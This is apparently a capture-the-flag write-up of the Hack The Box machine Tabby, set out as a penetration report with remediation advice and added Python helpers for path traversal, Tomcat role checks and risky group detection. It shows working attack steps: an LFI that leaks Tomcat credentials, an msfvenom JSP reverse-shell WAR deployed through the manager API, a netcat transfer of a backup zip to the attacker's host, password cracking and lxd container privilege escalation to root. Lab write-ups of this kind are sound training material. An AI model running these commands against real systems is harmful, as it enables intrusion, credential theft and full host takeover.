Tabby (Easy)

Lessons Learned

Penetration Report

Vulnerability Exploited: Local File Inclusion (LFI) in news.php

System Vulnerable: 10.10.10.194

Vulnerability Explanation: The news.php page on port 80 is vulnerable to LFI (path traversal in the file parameter). It lets us read /usr/share/tomcat9/etc/tomcat-users.xml, which contains the credentials of a Tomcat Manager account. Because that account holds the manager-script role, we can deploy a malicious WAR through /manager/text and obtain a shell as the tomcat user.

Privilege Escalation Vulnerability: Password reuse (the password of the backup zip is also ash's login password) and a misconfiguration: user ash is a member of the lxd group, which allows launching a privileged container with the host root filesystem mounted.

Vulnerability Fix: Validate and allowlist the file parameter in news.php so it cannot leave the intended directory; keep Tomcat credential files unreadable by the web server user; do not reuse passwords; and do not put untrusted users in the lxd group (lxd membership is equivalent to root).

Severity: High

Steps to Compromise the Host:

Reconnaissance

└─$ nmap -p- -sC -sV -T4 10.10.10.194 -Pn
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-29 11:59 EST
Nmap scan report for 10.10.10.194
Host is up (0.040s latency).
Not shown: 65532 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 45:3c:34:14:35:56:23:95:d6:83:4e:26:de:c6:5b:d9 (RSA)
|   256 89:79:3a:9c:88:b0:5c:ce:4b:79:b1:02:23:4b:44:a6 (ECDSA)
|_  256 1e:e7:b9:55:dd:25:8f:72:56:e8:8e:65:d5:19:b0:8d (ED25519)
80/tcp   open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Mega Hosting
8080/tcp open  http    Apache Tomcat
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Apache Tomcat
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Enumeration

Port 80 Apache/2.4.41

Running gobuster to find hidden directories.

└─$ gobuster dir -u http://10.10.10.194 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50            
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.194
[+] Method:                  GET
[+] Threads:                 50
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2021/11/29 12:04:32 Starting gobuster in directory enumeration mode
===============================================================
/files                (Status: 301) [Size: 312] [--> http://10.10.10.194/files/]
/assets               (Status: 301) [Size: 313] [--> http://10.10.10.194/assets/]
/server-status        (Status: 403) [Size: 277]                                  
                                                                                 
===============================================================
2021/11/29 12:07:39 Finished
===============================================================

Clicking the NEWS button redirects to the megahosting.htb domain. Add it to /etc/hosts.

The news page takes a file parameter, so we test it for LFI with a path traversal payload:

http://megahosting.htb/news.php?file=../../../../etc/passwd
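The following is an added example, not code from the original writeup. It builds the traversal URL used above, then puts the flawed include logic next to a hardened version. The include base (a files/ directory under the web root) is an assumption; the directory tree and the fake etc/passwd are constructed in a temporary directory so the script runs offline and never touches the real /etc.

```python
import os
import tempfile


def build_lfi_url(base, target, depth=4, param="file"):
    """Traversal URL for a file-include parameter.
    base: e.g. http://megahosting.htb/news.php; target: absolute path on the host.
    depth=4 reproduces the page's ../../../../etc/passwd payload."""
    payload = "../" * depth + target.lstrip("/")
    return f"{base}?{param}={payload}"


def vulnerable_include(webroot, user_file):
    """The flawed pattern (assumed include base: webroot/files): the parameter
    is joined straight onto the base, so '../' sequences walk out of it."""
    path = os.path.join(webroot, "files", user_file)
    with open(path) as f:
        return f.read()


def safe_include(webroot, user_file):
    """Hardened version: resolve '..' and symlinks, then require the result to
    stay strictly inside the allowed directory before opening anything."""
    allowed = os.path.realpath(os.path.join(webroot, "files"))
    resolved = os.path.realpath(os.path.join(allowed, user_file))
    if resolved == allowed or os.path.commonpath([allowed, resolved]) != allowed:
        raise PermissionError(f"traversal rejected: {user_file!r}")
    with open(resolved) as f:
        return f.read()


def demo():
    """Constructed sandbox: a fake /var/www/html/files and a fake /etc/passwd
    four directory levels up, mirroring the page's traversal depth."""
    root = tempfile.mkdtemp()
    webroot = os.path.join(root, "var", "www", "html")
    os.makedirs(os.path.join(webroot, "files"))
    os.makedirs(os.path.join(root, "etc"))
    with open(os.path.join(webroot, "files", "news1.txt"), "w") as f:
        f.write("legit news item")
    with open(os.path.join(root, "etc", "passwd"), "w") as f:
        f.write("root:x:0:0:root:/root:/bin/bash\n")  # constructed sample line

    payload = "../../../../etc/passwd"
    leaked = vulnerable_include(webroot, payload)      # file outside the web root
    try:
        safe_include(webroot, payload)
        blocked = False
    except PermissionError:
        blocked = True
    legit = safe_include(webroot, "news1.txt")         # normal use still works
    return leaked, blocked, legit


if __name__ == "__main__":
    print(build_lfi_url("http://megahosting.htb/news.php", "/etc/passwd"))
    leaked, blocked, legit = demo()
    print("vulnerable include leaked:", leaked.strip())
    print("hardened include blocked traversal:", blocked)
    print("hardened include served:", legit)
```

The realpath plus commonpath check is the important part: a simple `str_replace('../', '')` style filter is bypassable (`....//`) and does not handle absolute paths or symlinks, whereas checking the resolved path against the allowed directory rejects all of those at once.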

Port 8080 Apache Tomcat

The Tomcat default page on port 8080 mentions some interesting paths: /etc/tomcat9/tomcat-users.xml, /host-manager/html and /manager/html.

Since the application is vulnerable to LFI, we can use the path traversal to read tomcat-users.xml.

Tomcat Path

Requesting /etc/tomcat9/tomcat-users.xml through the LFI returns an empty response. Checking a local Tomcat 9 install for other locations of the file:

find / -name tomcat-users.xml
/usr/share/tomcat9/etc/tomcat-users.xml
/etc/tomcat9/tomcat-users.xml
The copy under /usr/share/tomcat9/etc is readable and the request returns the credentials:

GET /news.php?file=../../../../usr/share/tomcat9/etc/tomcat-users.xml HTTP/1.1
username="tomcat" password="$3cureP4s5w0rd123!" roles="admin-gui,manager-script"
  • admin-gui: access to the Host Manager application through its graphical web interface (/host-manager/html).

  • manager-script: access to the Manager application through its text interface (/manager/text) instead of the graphical web interface.

/manager/html returns access denied (403): the HTML Manager requires the manager-gui role, which this account does not have.

/host-manager/html works, because the account has admin-gui. More importantly, manager-script is enough to deploy applications through /manager/text.
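Added example, not part of the original writeup: parse a tomcat-users.xml recovered through the LFI, list which Manager and Host Manager endpoints each account can reach, and derive the deploy/undeploy commands from the parsed credentials. The role-to-endpoint mapping follows the Tomcat 9 Manager and Host Manager documentation; the sample XML is constructed around the single credential line the page recovered.

```python
import xml.etree.ElementTree as ET

# Roles checked by the Tomcat 9 Manager and Host Manager webapps.
ROLE_ENDPOINTS = {
    "manager-gui":    "/manager/html",
    "manager-script": "/manager/text",
    "manager-jmx":    "/manager/jmxproxy",
    "manager-status": "/manager/status",
    "admin-gui":      "/host-manager/html",
    "admin-script":   "/host-manager/text",
}

# Constructed sample: a tomcat-users.xml containing the line the page recovered.
SAMPLE_TOMCAT_USERS = """<?xml version="1.0" encoding="UTF-8"?>
<tomcat-users xmlns="http://tomcat.apache.org/xml"
              xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
              xsi:schemaLocation="http://tomcat.apache.org/xml tomcat-users.xsd"
              version="1.0">
  <role rolename="admin-gui"/>
  <role rolename="manager-script"/>
  <user username="tomcat" password="$3cureP4s5w0rd123!" roles="admin-gui,manager-script"/>
</tomcat-users>
"""


def parse_tomcat_users(xml_text):
    """Return {username: {"password": ..., "roles": [...]}} from tomcat-users.xml.
    Tags are compared without their namespace so both namespaced and plain files parse."""
    root = ET.fromstring(xml_text)
    users = {}
    for el in root.iter():
        if el.tag.split("}")[-1] != "user":
            continue
        roles = [r.strip() for r in el.get("roles", "").split(",") if r.strip()]
        users[el.get("username")] = {"password": el.get("password"), "roles": roles}
    return users


def reachable_endpoints(roles):
    """Manager/Host Manager paths the given roles unlock."""
    return sorted(ROLE_ENDPOINTS[r] for r in roles if r in ROLE_ENDPOINTS)


def can_deploy(roles):
    """WAR deployment needs manager-gui (HTML UI) or manager-script (text API)."""
    return bool({"manager-gui", "manager-script"} & set(roles))


def manager_text_commands(host, user, password, war="shell.war", ctx="/shell"):
    """curl lines for the text interface: list, deploy (as on the page) and the
    undeploy needed to clean up afterwards. Single quotes keep $ in the
    password and ? in the URL away from the shell."""
    auth = f"-u '{user}:{password}'"
    base = f"http://{host}:8080/manager/text"
    return {
        "list":     f"curl {auth} '{base}/list'",
        "deploy":   f"curl {auth} '{base}/deploy?path={ctx}' --upload-file {war}",
        "undeploy": f"curl {auth} '{base}/undeploy?path={ctx}'",
    }


if __name__ == "__main__":
    users = parse_tomcat_users(SAMPLE_TOMCAT_USERS)
    for name, info in users.items():
        print(name, info["roles"], reachable_endpoints(info["roles"]),
              "can deploy" if can_deploy(info["roles"]) else "cannot deploy")
        for k, v in manager_text_commands("10.10.10.194", name, info["password"]).items():
            print(f"  {k}: {v}")
```

The endpoint list makes the 403 on /manager/html and the successful deploy through /manager/text consistent with the same credential, and the undeploy command is what a tester should run once the shell is no longer needed.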

Exploitation

With the manager-script role we can deploy a WAR containing a JSP reverse shell.

└─$ msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.24 LPORT=1234 -f war > shell.war
Payload size: 1098 bytes
Final size of war file: 1098 bytes

Upload the payload with curl through the text interface (the password contains $, so it must be single-quoted):

└─$ curl -u 'tomcat:$3cureP4s5w0rd123!' http://10.10.10.194:8080/manager/text/deploy?path=/shell --upload-file shell.war               

OK - Deployed application at context path [/shell]

Start a netcat listener on port 1234 and trigger the payload by requesting the deployed application. This gives a shell as the tomcat user.

nc -lvp 1234
http://10.10.10.194:8080/shell

Privilege Escalation

Shell as ash

In /var/www/html/files there is a backup zip file. Transfer it with netcat: on our machine, start a listener on port 4444 that writes to a file.

nc -lvp 4444 > 16162020_backup.zip

On victim machine

tomcat@tabby:/var/www/html/files$ cat 16162020_backup.zip | nc 10.10.14.24 4444

Compare the md5sum on both sides to confirm the file arrived intact.

tomcat@tabby:/var/www/html/files$ md5sum 16162020_backup.zip
f0a0af346ad4495cfdb01bd5173b0a52  16162020_backup.zip

Crack the zip password with zip2john and john:

└─$ zip2john 16162020_backup.zip > 16162020_backup.txt
16162020_backup.zip/var/www/html/assets/ is not encrypted!
ver 1.0 16162020_backup.zip/var/www/html/assets/ is not encrypted, or stored with non-handled compression type
ver 2.0 efh 5455 efh 7875 16162020_backup.zip/var/www/html/favicon.ico PKZIP Encr: 2b chk, TS_chk, cmplen=338, decmplen=766, crc=282B6DE2
ver 1.0 16162020_backup.zip/var/www/html/files/ is not encrypted, or stored with non-handled compression type
ver 2.0 efh 5455 efh 7875 16162020_backup.zip/var/www/html/index.php PKZIP Encr: 2b chk, TS_chk, cmplen=3255, decmplen=14793, crc=285CC4D6
ver 1.0 efh 5455 efh 7875 16162020_backup.zip/var/www/html/logo.png PKZIP Encr: 2b chk, TS_chk, cmplen=2906, decmplen=2894, crc=2F9F45F
ver 2.0 efh 5455 efh 7875 16162020_backup.zip/var/www/html/news.php PKZIP Encr: 2b chk, TS_chk, cmplen=114, decmplen=123, crc=5C67F19E
ver 2.0 efh 5455 efh 7875 16162020_backup.zip/var/www/html/Readme.txt PKZIP Encr: 2b chk, TS_chk, cmplen=805, decmplen=1574, crc=32DB9CE3
NOTE: It is assumed that all files in each archive have the same password.
If that is not the case, the hash may be uncrackable. To avoid this, use
option -o to pick a file at a time.

└─$ john 16162020_backup.txt --wordlist=/usr/share/wordlists/rockyou.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
admin@it         (16162020_backup.zip)
1g 0:00:00:01 DONE (2021-11-30 01:09) 0.9090g/s 9417Kp/s 9417Kc/s 9417KC/s adnc153..adilizinha
Use the "--show" option to display all of the cracked passwords reliably
Session completed

The zip password admin@it is reused as ash's login password. Switch to ash with it:

tomcat@tabby:/var/www/html/files$ su ash
Password: 
ash@tabby:/var/www/html/files$ whoami
ash
ash@tabby:/var/www/html/files$ id
uid=1000(ash) gid=1000(ash) groups=1000(ash),4(adm),24(cdrom),30(dip),46(plugdev),116(lxd)
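Added example, not from the original writeup: the check a defender (or a tester triaging a foothold) would want here, which flags privilege-escalation-relevant group memberships both from `id` output and from /etc/group. The risky-group list and the reasons are the editor's selection of well-known cases; the sample `id` line is the one shown above and the /etc/group lines are constructed to match it.

```python
import re

# Groups that commonly translate into root on a Linux host, and why.
RISKY_GROUPS = {
    "lxd":    "can launch a privileged container with / mounted (this page's path)",
    "docker": "can run a container with the host filesystem mounted",
    "disk":   "raw read/write access to block devices",
    "sudo":   "may run commands as root depending on sudoers",
    "wheel":  "may run commands as root depending on sudoers",
    "adm":    "reads logs that often contain secrets",
    "shadow": "can read password hashes",
}

# The id output from the page.
SAMPLE_ID = ("uid=1000(ash) gid=1000(ash) groups=1000(ash),4(adm),24(cdrom),"
             "30(dip),46(plugdev),116(lxd)")

# Constructed /etc/group excerpt consistent with that membership.
SAMPLE_ETC_GROUP = """root:x:0:
adm:x:4:syslog,ash
lxd:x:116:ash
tomcat:x:998:
ash:x:1000:
"""


def groups_from_id(id_output):
    """Group names from the groups= field of `id` output, in order."""
    m = re.search(r"groups=(\S+)", id_output)
    if not m:
        return []
    return re.findall(r"\d+\(([^)]+)\)", m.group(1))


def risky_from_id(id_output):
    """Risky groups the current user belongs to, with the reason each matters."""
    return {g: RISKY_GROUPS[g] for g in groups_from_id(id_output) if g in RISKY_GROUPS}


def risky_members(etc_group):
    """Map each risky group to its explicit members (4th field of /etc/group).
    Users whose primary gid is a risky group do not appear here; that needs /etc/passwd."""
    out = {}
    for line in etc_group.splitlines():
        if not line or line.startswith("#"):
            continue
        name, _, _, members = line.split(":", 3)
        if name in RISKY_GROUPS and members:
            out[name] = members.split(",")
    return out


if __name__ == "__main__":
    for g, why in risky_from_id(SAMPLE_ID).items():
        print(f"current user is in {g}: {why}")
    for g, members in risky_members(SAMPLE_ETC_GROUP).items():
        print(f"{g}: {', '.join(members)}")
```

On a real host, feed it `id` and `cat /etc/group`; any non-administrative account listed under lxd or docker should be treated as already root.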

Shell as root

User ash is a member of the lxd group. Members of lxd can create a privileged container and mount the host root filesystem inside it, which is equivalent to root on the host.

Reference: https://book.hacktricks.xyz/linux-unix/privilege-escalation/interesting-groups-linux-pe/lxd-privilege-escalation

On our Kali machine, build an Alpine LXD image with distrobuilder:

└─$ sudo apt update
└─$ sudo apt install -y golang-go debootstrap rsync gpg squashfs-tools
└─$ sudo go get -d -v github.com/lxc/distrobuilder

[~/go/src/github.com]
└─$ git clone https://github.com/lxc/distrobuilder
Cloning into 'distrobuilder'...
remote: Enumerating objects: 4909, done.
remote: Counting objects: 100% (1770/1770), done.
remote: Compressing objects: 100% (932/932), done.
remote: Total 4909 (delta 1155), reused 1341 (delta 822), pack-reused 3139
Receiving objects: 100% (4909/4909), 1.72 MiB | 1.12 MiB/s, done.
Resolving deltas: 100% (3141/3141), done.

└─$ make
└─$ mkdir -p $HOME/ContainerImages/alpine/
└─$ cd $HOME/ContainerImages/alpine/
└─$ wget https://raw.githubusercontent.com/lxc/lxc-ci/master/images/alpine.yaml
└─$ sudo $HOME/go/bin/distrobuilder build-lxd alpine.yaml -o image.release=3.8

┌──(pwned㉿kali)-[~/ContainerImages/alpine]
└─$ mv lxd.tar.xz rootfs.squashfs ~/Desktop/HTB/tabby 

Transfer both files to the victim: start an HTTP server on Kali and fetch them with wget on the target.

python -m SimpleHTTPServer 80
ash@tabby:/tmp/test$ wget http://10.10.14.24/lxd.tar.xz
ash@tabby:/tmp/test$ wget http://10.10.14.24/rootfs.squashfs

lxc import error

ash@tabby:/tmp$ /snap/bin/lxc image import lxd.tar.xz rootfs.squashfs --alias alpine
If this is your first time running LXD on this machine, you should also run: lxd init
To start your first instance, try: lxc launch ubuntu:18.04

ash@tabby:/tmp$ lxd init 
Command 'lxd' is available in '/snap/bin/lxd'
The command could not be located because '/snap/bin' is not included in the PATH environment variable.
lxd: command not found
ash@tabby:/tmp$ /snap/bin/lxd init
Would you like to use LXD clustering? (yes/no) [default=no]: 
Do you want to configure a new storage pool? (yes/no) [default=yes]: 
Name of the new storage pool [default=default]: 
Name of the storage backend to use (lvm, zfs, ceph, btrfs, dir) [default=zfs]: 
Create a new ZFS pool? (yes/no) [default=yes]: 
Would you like to use an existing empty block device (e.g. a disk or partition)? (yes/no) [default=no]: 
Size in GB of the new loop device (1GB minimum) [default=5GB]: 
Would you like to connect to a MAAS server? (yes/no) [default=no]: 
Would you like to create a new local network bridge? (yes/no) [default=yes]: 
What should the new bridge be called? [default=lxdbr0]: 
What IPv4 address should be used? (CIDR subnet notation, “auto” or “none”) [default=auto]: 
What IPv6 address should be used? (CIDR subnet notation, “auto” or “none”) [default=auto]: 
Would you like the LXD server to be available over the network? (yes/no) [default=no]: 
Would you like stale cached images to be updated automatically? (yes/no) [default=yes] 
Would you like a YAML "lxd init" preseed to be printed? (yes/no) [default=no]: 

Running the image import from the web shell failed with the error below. Note that the two files had been downloaded into /tmp/test while the import was run from /tmp, so check the working directory before blaming the shell. In any case, the remaining steps were done over SSH, which also gives a proper TTY for lxc exec.

ash@tabby:/tmp$ /snap/bin/lxc image import lxd.tar.xz rootfs.squashfs --alias alpine
Error: open lxd.tar.xz: no such file or directory

Generate an SSH key pair for ash and install the public key:

ash@tabby:~/.ssh$ ssh-keygen -f ash
Generating public/private rsa key pair.
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in ash
Your public key has been saved in ash.pub
The key fingerprint is:
SHA256:A00C3sLJV3A0jHPkDAx9yXwW5No73zCio3YVa3IL0B0 ash@tabby
The key's randomart image is:
+---[RSA 3072]----+
|    o=+OBoo.     |
|   + o=XBoE      |
|    * +=++..     |
|     o...oo      |
|       .S .o     |
|        o.=.     |
|         *+.o    |
|      . o..+ +   |
|     ..o..  . .  |
+----[SHA256]-----+
ash@tabby:~/.ssh$ mv ash.pub authorized_keys

Copy the private key (ash) to our Kali machine as id_rsa and log in with it. Note that mv ash.pub authorized_keys replaces any existing authorized_keys file; cat ash.pub >> authorized_keys would preserve existing entries.

└─$ chmod 600 id_rsa                          
└─$ ssh -i id_rsa ash@10.10.10.194                                                   

ash@tabby:/tmp$ wget 10.10.14.24/lxd.tar.xz
ash@tabby:/tmp$ wget 10.10.14.24/rootfs.squashfs

ash@tabby:/tmp$ lxc image import lxd.tar.xz rootfs.squashfs --alias alpine
Image imported with fingerprint: bd0cf6d4dd19e5897e47710b009eaf09c98a42c68490f7d724ab35fbb599507f

ash@tabby:/tmp$ lxc image list
+--------+--------------+--------+----------------------------------------+--------------+-----------+--------+------------------------------+
| ALIAS  | FINGERPRINT  | PUBLIC |              DESCRIPTION               | ARCHITECTURE |   TYPE    |  SIZE  |         UPLOAD DATE          |
+--------+--------------+--------+----------------------------------------+--------------+-----------+--------+------------------------------+
| alpine | bd0cf6d4dd19 | no     | Alpinelinux 3.8 x86_64 (20211130_1340) | x86_64       | CONTAINER | 2.21MB | Nov 30, 2021 at 1:47pm (UTC) |
+--------+--------------+--------+----------------------------------------+--------------+-----------+--------+------------------------------+

ash@tabby:/tmp$ lxc init alpine privesc -c security.privileged=true
Creating privesc

ash@tabby:/tmp$ lxc list                  
+---------+---------+------+------+-----------+-----------+
|  NAME   |  STATE  | IPV4 | IPV6 |   TYPE    | SNAPSHOTS |
+---------+---------+------+------+-----------+-----------+
| privesc | STOPPED |      |      | CONTAINER | 0         |
+---------+---------+------+------+-----------+-----------+

ash@tabby:/tmp$ lxc config device add privesc host-root disk source=/ path=/mnt/root recursive=true
Device host-root added to privesc

ash@tabby:/tmp$ lxc start privesc
ash@tabby:/tmp$ lxc exec privesc /bin/sh
~ # id
uid=0(root) gid=0(root)
~ # whoami
root
~ # pwd
/root
~ # cd /mnt
/mnt # ls
root
/mnt # cd root/
/mnt/root/root # cd .ssh/
/mnt/root/root/.ssh # ls
authorized_keys  id_rsa           id_rsa.pub

Copy the contents of /mnt/root/root/.ssh/id_rsa (the host root user's private key, which matches the authorized_keys next to it) to our machine, paste it into root_rsa and log in as root:

└─$ touch root_rsa                                        
└─$ chmod 600 root_rsa                        
└─$ ssh -i root_rsa root@10.10.10.194                                                
